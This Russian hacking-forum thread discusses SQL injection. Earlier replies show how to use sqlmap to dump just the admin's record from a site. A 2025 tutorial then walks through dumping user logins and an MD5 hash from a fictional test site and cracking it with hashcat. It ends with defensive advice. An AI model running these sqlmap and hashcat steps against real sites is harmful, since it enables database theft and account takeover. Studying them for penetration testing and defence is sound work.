 |

23.09.2018, 10:43
|
|
Новичок
Регистрация: 08.12.2016
Сообщений: 0
С нами:
4962585
Репутация:
0
|
|
познавательно
AnnaDavydova сказал(а):
Обычный Hashcat не смог определить код для хэша DES. (не в меню справки). Однако оба cudaHashcat и oclHashcat нашли и взломали ключ
т. е. hashcat просто пропустил валидный пароль из словаря или что?
ааа, это перевод.. пардон
|
|
|

03.10.2018, 11:42
|
|
Новичок
Регистрация: 10.01.2018
Сообщений: 0
С нами:
4389206
Репутация:
0
|
|
Я вообще думал что cudahashcat и oclhashcat - это уже давно не рабочие инструменты, и что hashcat заменил их оба!!!
|
|
|

08.10.2019, 13:07
|
|
Новичок
Регистрация: 18.09.2019
Сообщений: 0
С нами:
3502401
Репутация:
0
|
|
подскажите, а если в базе данных более 10к пользователей?! можно каким то образом не дампить всех пользователей а именно админа? и как понять кто из них админ. что-то я не догоняю
|
|
|

08.10.2019, 21:03
|
|
Новичок
Регистрация: 05.08.2018
Сообщений: 0
С нами:
4091032
Репутация:
0
|
|
s unity сказал(а):
подскажите, а если в базе данных более 10к пользователей?! можно каким то образом не дампить всех пользователей а именно админа? и как понять кто из них админ. что-то я не догоняю
Конечно можно, самый простой способ это указать id в запросе, по-умолчанию id админа равен 1 (прошаренный админ сменит id, но это случается нечасто). Как-то так примерно:
SELECT * FROM login WHERE id=1
|
|
|

08.10.2019, 21:31
|
|
Новичок
Регистрация: 18.09.2019
Сообщений: 0
С нами:
3502401
Репутация:
0
|
|
explorer сказал(а):
Конечно можно, самый простой способ это указать id в запросе, по-умолчанию id админа равен 1 (прошаренный админ сменит id, но это случается нечасто). Как-то так примерно:
SELECT * FROM login WHERE id=1
Подскажи как указать это sqlmap? Я понял что за параметр, но как это протолкнуть в проге? И еше, админу могут держать свою инфу в недоступной для данного пользователя MySql?
|
|
|

08.10.2019, 22:20
|
|
Новичок
Регистрация: 05.08.2018
Сообщений: 0
С нами:
4091032
Репутация:
0
|
|
s unity сказал(а):
Подскажи как указать это sqlmap? Я понял что за параметр, но как это протолкнуть в проге? И еше, админу могут держать свою инфу в недоступной для данного пользователя MySql?
Очень просто:
sqlmap -u http://vulnsite.php?id=1 -D db_name --where="id=1" --dump
P.S. Встречаются ограничения в плане привилегий, когда текущий пользователь, например может получить названия таблиц и колонок, а записи из колонок нет. Ещё может быть 2 и более баз данных на сайте, и в текущей базе никаких вкусняшек нет, но они находятся в других базах .
|
|
|

05.09.2020, 17:37
|
|
Новичок
Регистрация: 13.08.2020
Сообщений: 0
С нами:
3026781
Репутация:
0
|
|
Может ли лежать пароль от админки сайта в information_schema? или в базе данных?
|
|
|

05.09.2020, 20:44
|
|
Новичок
Регистрация: 05.08.2018
Сообщений: 0
С нами:
4091032
Репутация:
0
|
|
whoamikarate сказал(а):
Может ли лежать пароль от админки сайта в information_schema? или в базе данных?
Не может, а с вероятностью 99% именно в базе данных он и лежит. И с вероятностью более 90% он будет захеширован, то есть пароль находится не в открытом виде. Пример из дампа БД:

|
|
|

01.07.2025, 01:02
|
|
Новичок
Регистрация: 14.08.2015
Сообщений: 0
С нами:
5656404
Репутация:
0
|
|
Всем привет, античат !
Предыдущая часть: SQLMAP: гайд по SQL-инъекциям и обходу WAF (2025)
Подробный гайд, который часто просят новички. Разберём классический сценарий — эксплуатация SQL-инъекции с помощью связки SQLMap + Hashcat. Пройдём весь путь от получения структуры базы данных до взлома пароля.
Важно: всё, что вы увидите ниже — полностью вымышленный сценарий. URL, база данных и хеши созданы специально для этого руководства. Цель — научиться работать с инструментами, а не ломать реальные сайты. Помните об этике и законодательстве. Погнали!
Представим, что мы уже нашли уязвимый параметр на неком сайте. Наш старт — вот этот URL:
Код:
http://test-site.local/item.php?id=15
.
Шаг 1: Разведка. Узнаём столбцы в таблице
Первым делом нужно понять, какая структура у таблицы, где, как мы предполагаем, лежат данные пользователей. Наша цель — найти поля с логином и паролем в таблице
внутри базы
.
Команда:
Bash:
Код:
sqlmap -u
"http://test-site.local/item.php?id=15"
-D clemcoindustries -T user_info --columns
- — наш целевой URL. Берём его в кавычки, это хорошая привычка.
- — указываем имя базы данных, которое мы могли узнать на предыдущих этапах разведки.
- — конкретная таблица, которая нас интересует.
- — команда, которая говорит SQLMap: «Эй, покажи-ка мне все столбцы из этой таблицы».
Что вернёт SQLMap:
Код:
Код:
[INFO] retrieved: user_id — int(10) unsigned
[INFO] retrieved: user_login — varchar(50)
[INFO] retrieved: user_password — varchar(255)
[INFO] retrieved: user_salt — varchar(16)
[INFO] retrieved: record_status — tinyint(4)
Отлично, столбцы
и
на месте. Это наши цели.
Шаг 2: Получаем имена пользователей
Теперь, когда мы знаем, где искать, давайте вытащим логины. Это полезно, чтобы убедиться, что в таблице вообще есть данные.
Bash:
Код:
sqlmap -u
"http://test-site.local/item.php?id=15"
-D clemcoindustries -T user_info -C user_login --dump
Тут всё знакомо, кроме двух флагов: - — говорим, что нам нужен только столбец с логинами.
- — команда для извлечения (дампа) данных.
Примерный вывод:
Код:
Код:
Database: clemcoindustries
Table: user_info
[1 entry]
+------------+
| user_login |
+------------+
| admin |
+------------+
Супер, у нас есть пользователь
. Теперь самое интересное.
Шаг 3: Извлекаем хеш пароля
Действуем по аналогии, но теперь наша цель — столбец
.
Bash:
Код:
sqlmap -u
"http://test-site.local/item.php?id=15"
-D clemcoindustries -T user_info -C user_password --dump
Результат:
Код:
Код:
Database: clemcoindustries
Table: user_info
[1 entry]
+----------------------------------+
| user_password |
+----------------------------------+
| 202cb962ac59075b964b07152d234b70 |
+----------------------------------+
SQLMap, скорее всего, сам подскажет, что это похоже на хеш и предложит его взломать. Но мы сделаем это вручную, чтобы понять процесс.
Шаг 4: Определяем тип хеша
Что это за строка
Код:
202cb962ac59075b964b07152d234b70
? С опытом вы будете узнавать некоторые хеши «в лицо», но для надёжности воспользуемся утилитой из Kali Linux —
.
Вводим наш хеш:
Код:
Код:
$ hash-identifier
HASH: 202cb962ac59075b964b07152d234b70
Possible Hashs :
[+] MD5
Как и предполагалось, это старый добрый MD5. Очень небезопасный по нынешним меркам, но всё ещё встречающийся в старых системах.
Шаг 5: Крашим хеш с помощью Hashcat
Финальный рывок. Создаём файл
и записываем в него наш хеш. Затем запускаем тяжёлую артиллерию — Hashcat.
Bash:
Код:
hashcat -m
0
-a
0
hash.txt /usr/share/wordlists/rockyou.txt
Разберём эту магию: - — это код режима для MD5. Для каждого типа хеша у Hashcat есть свой код.
- — режим атаки. Ноль — это классический перебор по словарю (Straight).
- — наш файл с хешем.
Код:
/usr/share/wordlists/rockyou.txt
— путь к знаменитому словарю. Если у вас его нет, обязательно установите.
Итог работы Hashcat:
Код:
Код:
202cb962ac59075b964b07152d234b70:abc123
Session..........: hashcat
Status...........: Cracked
...
Победа! Пароль —
.
Конечно, наш вымышленный пример был довольно простым. В реальных задачах всё бывает куда интереснее: фильтры, кастомное хеширование и многоуровневая защита. Чтобы увидеть, как похожие техники применяются на практике, очень советую почитать разборы (райтапы) с CTF. Там можно подсмотреть много полезных фишек.
Вот, например, пара свежих разборов веб-заданий от наших форумчан: Мораль и защита: что нужно знать
А теперь самое главное. Мы всё это делали не ради взлома, а чтобы понять, как защищаться. - Не доверяйте данным. Всегда проверяйте команды и имена, которые вы используете. Опечатка в имени таблицы или столбца — и вы впустую потратите время.
- Хеширование — это не шифрование. Наш пример с MD5 идеально показывает, почему он плох. Его можно быстро взломать перебором по словарю. В 2025 году использовать MD5 для паролей — преступление. Смотрите в сторону bcrypt, scrypt или Argon2, которые являются адаптивными и требуют больших вычислительных ресурсов для взлома.
- Этика и закон. Ещё раз: все эти действия легальны только в рамках официального тестирования на проникновение (пентеста) или на собственных учебных стендах. На форуме
мы за белый хакинг.
- Главная защита от SQL-инъекций.
- Параметризованные запросы (Prepared Statements): Это основной и самый надёжный способ. Он разделяет код SQL-запроса и данные, не давая пользователю вмешаться в логику запроса.
- ORM (Object-Relational Mapping): Фреймворки вроде Django, Ruby on Rails или Laravel используют ORM, которые в большинстве случаев автоматически создают безопасные запросы.
- WAF (Web Application Firewall): Хороший дополнительный уровень защиты, который может отфильтровать вредоносные запросы ещё на подлёте.
- Принцип наименьших привилегий: Учётная запись, от имени которой веб-приложение подключается к БД, не должна иметь прав на всю базу данных. Только на те таблицы и операции, которые ей реально нужны.
- Профессиональный рост. Понимание таких атак — это только первый шаг. Чтобы развиваться в пентесте и превратить это в профессию, нужен системный подход. Кстати, на античат есть отличная статья о том, как спланировать свой путь в эту сферу, особенно если вы переходите из другого IT-направления.
Итак, наш путь в пяти шагах: - Разведали структуру таблицы через
.
- Вытащили логин и хеш пароля с помощью
.
- Определили тип хеша — MD5.
- Подобрали пароль (
) через Hashcat.
- Сделали выводы о том, как строить надёжную защиту.
Надеюсь, этот разбор был полезен. Если есть вопросы или хотите обсудить другие сценарии — пишите в комментариях!
Обновлено и дополнено командой античат на основе официальной документации sqlmap и практического опыта.
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|